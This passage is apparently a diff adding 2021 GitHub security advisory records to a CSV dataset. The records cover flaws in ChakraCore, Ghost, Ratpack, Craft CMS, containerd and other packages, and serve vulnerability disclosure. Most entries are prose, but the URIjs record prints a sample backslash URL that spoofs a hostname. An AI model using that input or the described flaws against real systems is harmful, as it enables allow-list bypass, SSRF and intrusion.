+1.4.0,GHSA-h2xm-2p6w-mj2v,2021-07-26T22:17:18Z,2021-07-28T18:58:14Z,,['CVE-2020-0831'],Out-of-bounds Write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0831'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0831'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T22:17:18Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-fv48-hjhp-94c7,2021-07-26T21:12:18Z,2021-07-26T21:20:38Z,,['CVE-2020-12477'],Incorrect Authorization in TeamPass,The REST API functions in TeamPass 2.1.27.36 allow any user with a valid API token to bypass IP address whitelist restrictions via an X-Forwarded-For client HTTP header to the getIp function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.27.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-12477'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/TeamPass/issues/2761'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:12:18Z', 'nvd_published_at': '2020-04-29T22:15:00Z'}"
+1.4.0,GHSA-6cgh-hjpw-q3gq,2021-07-02T18:25:08Z,2021-07-02T19:20:33Z,,['CVE-2021-32738'],Utils.readChallengeTx does not verify the server account signature,"The `Utils.readChallengeTx` function used in [SEP-10 Stellar Web Authentication](https://github.com/stellar/stellar-protocol/blob/master/ecosystem/sep-0010.md) states in its function documentation that it reads and validates the challenge transaction including verifying that the `serverAccountID` has signed the transaction. The function does not verify that the server has signed the transaction and has been fixed so that it does in v8.2.3.
+
+Applications that also used `Utils.verifyChallengeTxThreshold` or `Utils.verifyChallengeTxSigners` to verify the signatures including the server signature on the challenge transaction are unaffected as those functions verify the server signed the transaction.
+
+Applications calling `Utils.readChallengeTx` should update to v8.2.3 to ensure that the challenge transaction is completely valid and signed by the server creating the challenge transaction.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'stellar-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/stellar/js-stellar-sdk/security/advisories/GHSA-6cgh-hjpw-q3gq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32738'}, {'type': 'WEB', 'url': 'https://github.com/stellar/js-stellar-sdk/commit/6f0bb889c2d10b431ddd5f4a1bcdd519c80430b3'}, {'type': 'WEB', 'url': 'https://github.com/stellar/js-stellar-sdk/releases/tag/v8.2.3'}]","{'cwe_ids': ['CWE-287', 'CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T18:25:08Z', 'nvd_published_at': '2021-07-02T19:15:00Z'}"
+1.4.0,GHSA-rr6v-h7m8-wc9f,2021-07-29T15:14:44Z,2021-07-19T21:21:33Z,,['CVE-2021-28114'],Cross-site Scripting in Froala WYSIWYG Editor,Froala WYSIWYG Editor 3.2.6-1 is affected by XSS due to a namespace confusion during parsing.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'froala/wysiwyg-editor'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28114'}, {'type': 'WEB', 'url': 'https://froala.com/wysiwyg-editor/'}, {'type': 'WEB', 'url': 'https://labs.bishopfox.com/advisories/froala-editor-v3.2.6'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T16:39:49Z', 'nvd_published_at': '2021-07-16T13:15:00Z'}"
+1.4.0,GHSA-fp63-499m-hq6m,2021-07-09T14:04:21Z,2021-07-12T16:53:00Z,,['CVE-2021-32752'],Files or Directories Accessible to External Parties in ether/logs,"### Impact
+A vulnerability was found that allowed authenticated admin users to access any file on the server.
+
+### Patches
+The vulnerability has been fixed in 3.0.4.
+
+### Workarounds
+We recommend disabling the plugin if untrustworthy sources have admin access.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [ether/logs](https://github.com/ethercreative/logs/issues)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'ether/logs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethercreative/logs/security/advisories/GHSA-fp63-499m-hq6m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32752'}, {'type': 'WEB', 'url': 'https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4'}, {'type': 'WEB', 'url': 'https://github.com/ethercreative/logs/releases/tag/3.0.4'}]","{'cwe_ids': ['CWE-552'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-09T14:04:21Z', 'nvd_published_at': '2021-07-09T14:15:00Z'}"
+1.4.0,GHSA-j5c2-hm46-wp5c,2021-09-03T20:23:05Z,2021-07-22T19:43:16Z,,['CVE-2021-39192'],Privilege escalation: all users can access Admin-level API keys,"### Impact
+An error in the implementation of the limits service in 4.0.0 allows all authenticated users (including contributors) to view admin-level API keys via the integrations API endpoint, leading to a privilege escalation vulnerability.
+
+Ghost(Pro) has already been patched. Self-hosters are impacted if running Ghost a version between 4.0.0 and 4.9.4. Immediate action should be taken to secure your site - see patches & workarounds below.
+
+It is highly recommended to regenerate all API keys after patching or applying the workaround below.
+
+### Patches
+Fixed in 4.10.0, all 4.x sites should upgrade as soon as possible.
+
+### Workarounds
+- Disable all non-Administrator accounts to prevent API access.
+
+### For more information
+If you have any questions or comments about this advisory:
+* email us at security@ghost.org
+
+---
+Credits: Aden Yap Chuen Zhen, BAE Systems Applied Intelligence (Malaysia)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.10.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/security/advisories/GHSA-j5c2-hm46-wp5c'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39192'}, {'type': 'PACKAGE', 'url': 'https://github.com/TryGhost/Ghost'}, {'type': 'WEB', 'url': 'https://github.com/TryGhost/Ghost/releases/tag/v4.10.0'}]","{'cwe_ids': ['CWE-200', 'CWE-269'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:44:30Z', 'nvd_published_at': '2021-09-03T15:15:00Z'}"
+1.4.0,GHSA-mx67-wv8x-hvv9,2021-09-15T19:12:25Z,2021-07-26T21:24:09Z,2021-09-15T19:12:25Z,['CVE-2021-23410'],Deserialization of Untrusted Data in msgpack,"# Withdrawn
+
+This advisory was withdrawn by its CNA (Snyk).
+
+## Original advisory
+
+All versions of package `msgpack` are vulnerable to Deserialization of Untrusted Data via the unpack function. This does not affect the similarly named package `@msgpack/msgpack`.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'msgpack'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23410'}, {'type': 'PACKAGE', 'url': 'https://github.com/msgpack/msgpack-node/'}, {'type': 'WEB', 'url': 'https://github.com/msgpack/msgpack-node/blob/master/src/msgpack.cc%23L302-L335'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MSGPACK-1296122'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:38:45Z', 'nvd_published_at': '2021-07-21T17:15:00Z'}"
+1.4.0,GHSA-62ww-4p3p-7fhj,2021-05-25T20:48:19Z,2021-07-02T18:33:02Z,,['CVE-2021-22135'],API information disclosure flaw in Elasticsearch,Elasticsearch versions before 7.11.2 and 6.8.15 contain a document disclosure flaw was found in the Elasticsearch suggester and profile API when Document and Field Level Security are enabled. The suggester and profile API are normally disabled for an index when document level security is enabled on the index. Certain queries are able to enable the profiler and suggester which could lead to disclosing the existence of documents and fields the attacker should not be able to view.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.11.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.elasticsearch:elasticsearch'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.8.15'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22135'}, {'type': 'WEB', 'url': 'https://discuss.elastic.co/t/elastic-stack-7-12-0-and-6-8-15-security-update/268125'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210625-0003/'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T20:02:56Z', 'nvd_published_at': '2021-05-13T18:15:00Z'}"
+1.4.0,GHSA-89gv-h8wf-cg8r,2023-09-07T20:18:00Z,2021-07-19T21:22:36Z,,['CVE-2021-3647'],URIjs Vulnerable to Hostname spoofing via backslashes in URL ,"### Impact
+If using affected versions to determine a URL's hostname, the hostname can be spoofed by using a combination of backslash (`\`) and slash (`/`) characters as part of the scheme delimiter, e.g. `scheme:/\/\/\hostname`. If the hostname is used in security decisions, the decision may be incorrect.
+
+Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
+
+Example URL: `https:/\/\/\expected-example.com/path`
+Escaped string: `https:/\\/\\/\\expected-example.com/path` (JavaScript strings must escape backslash)
+
+Affected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html).
+
+### Patches
+Version 1.19.7 is patched against all known payload variants.
+
+### References
+https://github.com/medialize/URI.js/releases/tag/v1.19.7 (fix for this particular bypass)
+https://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for related bypass)
+https://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass)
+https://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass)
+[PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling)
+
+### For more information
+If you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js
+
+### Reporter credit
+[ready-research](https://github.com/ready-research) via https://huntr.dev/","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'urijs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/security/advisories/GHSA-89gv-h8wf-cg8r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3647'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/pull/233'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/commit/ac43ca8f80c042f0256fb551ea5203863dec4481'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.3'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.4'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.6'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.7'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1625558772840-medialize/URI.js'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T16:38:54Z', 'nvd_published_at': '2021-07-16T11:15:00Z'}"
+1.4.0,GHSA-c8qc-62qv-5p2x,2021-07-26T22:14:49Z,2021-07-28T18:58:22Z,,['CVE-2020-0828'],Out-of-bounds Write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0828'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0828'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T22:14:49Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-h58v-c6rf-g9f7,2023-04-25T16:32:27Z,2021-07-01T17:00:04Z,,['CVE-2021-35210'],Cross site scripting in the system log,"### Impact
+
+It is possible to inject code into the `tl_log` table that will be executed in the browser when the system log is called in the back end.
+
+### Patches
+
+Update to Contao 4.9.16 or 4.11.5.
+
+### Workarounds
+
+Disable the system log module in the back end for all users (especially admin users).
+
+### References
+
+https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021
+
+### For more information
+
+If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.9.16'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.11.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-h58v-c6rf-g9f7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35210'}, {'type': 'WEB', 'url': 'https://contao.org/en/security-advisories/cross-site-scripting-in-the-system-log-2021.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-23T20:24:28Z', 'nvd_published_at': '2021-06-23T11:15:00Z'}"
+1.4.0,GHSA-5p67-cp9c-hqw4,2021-07-27T14:20:39Z,2021-07-28T18:57:19Z,,['CVE-2020-0848'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0848'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0848'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:20:39Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}"
+1.4.0,GHSA-9vh5-r4qw-v3vv,2021-07-27T15:15:57Z,2021-07-28T17:57:46Z,,['CVE-2020-7220'],Improper Resource Shutdown or Release in HashiCorp Vault,"HashiCorp Vault Enterprise 0.11.0 through 1.3.1 fails, in certain circumstances, to revoke dynamic secrets for a mount in a deleted namespace. Fixed in 1.3.2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7220'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#132-january-22nd-2020'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/vault/'}]","{'cwe_ids': ['CWE-404'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:15:57Z', 'nvd_published_at': '2020-01-23T18:15:00Z'}"
+1.4.0,GHSA-w4wq-rvmq-77x7,2021-07-26T17:36:48Z,2021-07-26T21:23:58Z,,['CVE-2021-23411'],Cross-site scripting in anchorme,All versions of package anchorme are vulnerable to Cross-site Scripting (XSS) via the main functionality.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'anchorme'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23411'}, {'type': 'WEB', 'url': 'https://github.com/alexcorvi/anchorme.js/blob/gh-pages/src/transform.ts#23L81'}, {'type': 'WEB', 'url': 'https://github.com/alexcorvi/anchorme.js/blob/gh-pages/src/transform.ts%23L81'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1320695'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ANCHORME-1311008'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T17:36:48Z', 'nvd_published_at': '2021-07-21T15:15:00Z'}"
+1.4.0,GHSA-phj8-4cq3-794g,2021-09-01T19:32:49Z,2021-07-01T17:02:13Z,,['CVE-2021-29481'],Unencrypted storage of client side sessions,"### Impact
+
+The default configuration of client side sessions results in unencrypted, but signed, data being set as cookie values. This means that if something sensitive goes into the session, it could be read by something with access to the cookies.
+
+Note: the documentation does point this out and encourage users to add an encryption key, but it is not mandatory.
+
+For this to be a vulnerability, some kind of sensitive data would need to be stored in the session and the session cookie would have to leak. For example, the cookies are not configured with httpOnly and an adjacent XSS vulnerability within the site allowed capture of the cookies.
+
+The proposed change is to change the default behaviour to use a randomly generated encryption key. This would mean that sessions do not survive app restarts, but this is already the behaviour given the random signing key.
+
+### Patches
+
+As of version 1.9.0, a securely randomly generated signing key is used.
+
+### Workarounds
+
+Supply an encryption key, as per the documentation recommendation.
+
+### References
+
+- https://github.com/ratpack/ratpack/pull/1590
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-session'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-phj8-4cq3-794g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29481'}, {'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/pull/1590'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}]","{'cwe_ids': ['CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:48:41Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}"
+1.4.0,GHSA-x2j7-6hxm-87p3,2023-09-21T19:51:08Z,2021-07-02T18:36:41Z,,['CVE-2021-27903'],Craft CMS Remote Code Injection,"An issue was discovered in Craft CMS before 3.6.7. In some circumstances, a potential Remote Code Execution vulnerability existed on sites that did not restrict administrative changes (if an attacker were somehow able to hijack an administrator's session).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27903'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/c17728fa0bec11d3b82c34defe0930ed409aec38'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#367---2021-02-23'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#security'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T21:38:23Z', 'nvd_published_at': '2021-06-30T12:15:00Z'}"
+1.4.0,GHSA-w6rq-6h34-vh7q,2021-09-01T19:32:52Z,2021-07-01T17:02:38Z,,['CVE-2021-29479'],Cached redirect poisoning via X-Forwarded-Host header,"A user supplied `X-Forwarded-Host` header can be used to perform cache poisoning of a cache fronting a Ratpack server if the cache key does not include the `X-Forwarded-Host` header as a cache key.
+
+Users are only vulnerable if they do not configure a custom `PublicAddress` instance. A custom `PublicAddress` can be specified by using [ServerConfigBuilder::publicAddress](https://ratpack.io/manual/current/api/ratpack/server/ServerConfigBuilder.html#publicAddress-java.net.URI-). For versions prior to 1.9.0, by default, Ratpack utilizes an inferring version of `PublicAddress` which is vulnerable.
+
+### Impact
+
+This can be used to perform redirect cache poisoning where an attacker can force a cached redirect to redirect to their site instead of the intended redirect location.
+
+### Patches
+
+As of Ratpack 1.9.0, two changes have been made that mitigate this vulnerability:
+
+1. The default PublicAddress implementation no longer infers the address from the request context, instead relying on the configured bind host/port
+2. Relative redirects issued by the application are no longer absolutized; they are passed through as-is
+
+### Workarounds
+
+In production, ensure that [ServerConfigBuilder::publicAddress](https://ratpack.io/manual/current/api/ratpack/server/ServerConfigBuilder.html#publicAddress-java.net.URI-) correctly configures the server.
+
+### References
+ - https://portswigger.net/web-security/web-cache-poisoning","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-w6rq-6h34-vh7q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29479'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}, {'type': 'WEB', 'url': 'https://portswigger.net/web-security/web-cache-poisoning'}]","{'cwe_ids': ['CWE-807'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:50:31Z', 'nvd_published_at': '2021-06-29T15:15:00Z'}"
+1.4.0,GHSA-3jxh-789f-p7m6,2023-09-21T19:21:04Z,2021-07-02T18:36:31Z,,['CVE-2021-27902'],Craft CMS Cross-site Scripting Vulnerability,"An issue was discovered in Craft CMS before 3.6.0. In some circumstances, a potential XSS vulnerability existed in connection with front-end forms that accepted user uploads.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27902'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/8ee85a8f03c143fa2420e7d6f311d95cae3b19ce'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#360---2021-01-26'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#security-1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-01T21:37:59Z', 'nvd_published_at': '2021-06-30T12:15:00Z'}"
+1.4.0,GHSA-gwrj-88fp-5m36,2023-01-24T15:09:14Z,2021-07-02T18:36:01Z,,['CVE-2021-35514'],Code injection in Narou,Narou (aka Narou.rb) before 3.8.0 allows Ruby Code Injection via the title name or author name of a novel.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'narou'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-35514'}, {'type': 'WEB', 'url': 'https://github.com/whiteleaf7/narou/commit/d07720e855293182563b749431dfbf6c2d1cdb42'}, {'type': 'PACKAGE', 'url': 'https://github.com/whiteleaf7/narou'}, {'type': 'WEB', 'url': 'https://github.com/whiteleaf7/narou/blob/develop/ChangeLog.md#380-20210627'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/51'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:42:19Z', 'nvd_published_at': '2021-06-28T12:15:00Z'}"
+1.4.0,GHSA-c72p-9xmj-rx3w,2023-04-03T22:38:53Z,2021-07-26T21:17:45Z,,['CVE-2021-32760'],Archive package allows chmod of file outside of unpack target directory,"## Impact
+
+A bug was found in containerd where pulling and extracting a specially-crafted container image can result in Unix file permission changes for existing files in the host’s filesystem. Changes to file permissions can deny access to the expected owner of the file, widen access to others, or set extended bits like setuid, setgid, and sticky. This bug does not directly allow files to be read, modified, or executed without an additional cooperating process.
+
+## Patches
+
+This bug has been fixed in containerd 1.5.4 and 1.4.8. Users should update to these versions as soon as they are released. Running containers do not need to be restarted.
+
+## Workarounds
+
+Ensure you only pull images from trusted sources.
+
+Linux security modules (LSMs) like SELinux and AppArmor can limit the files potentially affected by this bug through policies and profiles that prevent containerd from interacting with unexpected files.
+
+## For more information
+
+If you have any questions or comments about this advisory:
+
